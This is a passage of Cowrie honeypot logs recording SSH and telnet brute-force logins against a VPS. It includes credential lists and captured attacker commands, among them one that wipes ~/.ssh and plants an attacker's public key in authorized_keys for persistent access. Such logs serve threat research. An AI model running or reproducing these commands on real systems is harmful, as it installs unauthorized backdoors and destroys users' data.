nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:57:57.553760Z","src_ip":"212.227.235.229","session":"d2ad5732693a"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:57.555650Z","src_ip":"212.227.235.229","session":"d2ad5732693a"}
{"eventid":"cowrie.session.closed","duration":10.184524536132812,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:58:06.249472Z","src_ip":"212.227.235.229","session":"c68145df8a6d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52540,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dd8c2c79a58","protocol":"ssh","message":"New connection: 217.72.205.35:52540 (1.2.3.4:22) [session: 1dd8c2c79a58]","sensor":"my-vps","timestamp":"2025-08-26T04:58:41.393569Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:58:41.395047Z","src_ip":"217.72.205.35","session":"1dd8c2c79a58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45808,"dst_ip":"1.2.3.4","dst_port":22,"session":"079fbd26c5e9","protocol":"ssh","message":"New connection: 212.227.235.229:45808 (1.2.3.4:22) [session: 079fbd26c5e9]","sensor":"my-vps","timestamp":"2025-08-26T04:58:44.856609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:58:44.857509Z","src_ip":"212.227.235.229","session":"079fbd26c5e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:58:45.126749Z","src_ip":"212.227.235.229","session":"079fbd26c5e9"}
{"eventid":"cowrie.login.failed","username":"newuser","password":"12345678","message":"login attempt [newuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T04:58:46.240858Z","src_ip":"212.227.235.229","session":"079fbd26c5e9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:58:47.512424Z","src_ip":"212.227.235.229","session":"079fbd26c5e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50262,"dst_ip":"1.2.3.4","dst_port":23,"session":"a9cea783cb3a","protocol":"telnet","message":"New connection: 212.227.235.229:50262 (1.2.3.4:23) [session: a9cea783cb3a]","sensor":"my-vps","timestamp":"2025-08-26T04:58:49.585262Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:58:49.791604Z","src_ip":"212.227.235.229","session":"a9cea783cb3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:58:49.843425Z","src_ip":"212.227.235.229","session":"a9cea783cb3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60062,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3229b44e334","protocol":"ssh","message":"New connection: 212.227.235.229:60062 (1.2.3.4:22) [session: d3229b44e334]","sensor":"my-vps","timestamp":"2025-08-26T04:59:17.105646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:59:17.106506Z","src_ip":"212.227.235.229","session":"d3229b44e334"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:59:18.315578Z","src_ip":"212.227.235.229","session":"d3229b44e334"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456789","message":"login attempt [administrator/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T04:59:19.054173Z","src_ip":"212.227.235.229","session":"d3229b44e334"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34526,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb5f444dd886","protocol":"telnet","message":"New connection: 212.227.125.160:34526 (1.2.3.4:23) [session: bb5f444dd886]","sensor":"my-vps","timestamp":"2025-08-26T04:59:19.594275Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:59:20.048344Z","src_ip":"212.227.125.160","session":"bb5f444dd886"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:59:20.301172Z","src_ip":"212.227.235.229","session":"d3229b44e334"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T04:59:21.500340Z","src_ip":"212.227.125.160","session":"bb5f444dd886"}
{"eventid":"cowrie.session.closed","duration":2.584632158279419,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:59:22.178804Z","src_ip":"212.227.125.160","session":"bb5f444dd886"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47684,"dst_ip":"1.2.3.4","dst_port":23,"session":"9b9615432c9d","protocol":"telnet","message":"New connection: 212.227.125.160:47684 (1.2.3.4:23) [session: 9b9615432c9d]","sensor":"my-vps","timestamp":"2025-08-26T04:59:22.341116Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:59:22.720483Z","src_ip":"212.227.125.160","session":"9b9615432c9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:59:22.744875Z","src_ip":"212.227.125.160","session":"9b9615432c9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.1","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:59:25.826248Z","src_ip":"212.227.125.160","session":"9b9615432c9d"}
{"eventid":"cowrie.session.closed","duration":3.4890124797821045,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:59:25.830054Z","src_ip":"212.227.125.160","session":"9b9615432c9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50678,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f934ec13d75","protocol":"ssh","message":"New connection: 212.227.235.229:50678 (1.2.3.4:22) [session: 6f934ec13d75]","sensor":"my-vps","timestamp":"2025-08-26T05:00:03.828906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:00:03.837056Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:00:04.122904Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.login.success","username":"root","password":"daniel","message":"login attempt [root/daniel] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:00:05.206641Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:00:05.830188Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:00:05.831123Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:00:05.833193Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:00:06.104300Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:00:06.722275Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:00:06.723386Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:00:06.994876Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:00:06.996109Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50692,"dst_ip":"1.2.3.4","dst_port":22,"session":"724841a70534","protocol":"ssh","message":"New connection: 212.227.235.229:50692 (1.2.3.4:22) [session: 724841a70534]","sensor":"my-vps","timestamp":"2025-08-26T05:00:07.263731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:00:07.264372Z","src_ip":"212.227.235.229","session":"724841a70534"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:00:07.534575Z","src_ip":"212.227.235.229","session":"724841a70534"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:00:08.653370Z","src_ip":"212.227.235.229","session":"724841a70534"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:00:09.925306Z","src_ip":"212.227.235.229","session":"724841a70534"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50706,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dfd0c34f2cc","protocol":"ssh","message":"New connection: 212.227.235.229:50706 (1.2.3.4:22) [session: 4dfd0c34f2cc]","sensor":"my-vps","timestamp":"2025-08-26T05:00:10.191276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:00:10.192199Z","src_ip":"212.227.235.229","session":"4dfd0c34f2cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:00:10.459873Z","src_ip":"212.227.235.229","session":"4dfd0c34f2cc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:00:11.573154Z","src_ip":"212.227.235.229","session":"4dfd0c34f2cc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:00:11.843336Z","src_ip":"212.227.235.229","session":"4dfd0c34f2cc"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:00:11.844370Z","src_ip":"212.227.235.229","session":"6f934ec13d75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48894,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c47b92dd537","protocol":"ssh","message":"New connection: 212.227.235.229:48894 (1.2.3.4:22) [session: 2c47b92dd537]","sensor":"my-vps","timestamp":"2025-08-26T05:00:41.713970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:00:41.714895Z","src_ip":"212.227.235.229","session":"2c47b92dd537"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53388,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f3129313901","protocol":"ssh","message":"New connection: 212.227.235.229:53388 (1.2.3.4:22) [session: 7f3129313901]","sensor":"my-vps","timestamp":"2025-08-26T05:01:19.713379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:01:19.714739Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:01:19.983443Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword123!","message":"login attempt [root/P@ssword123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:01:21.102188Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:01:21.657404Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:01:21.658301Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:01:21.659810Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:01:21.929893Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:01:22.580328Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys 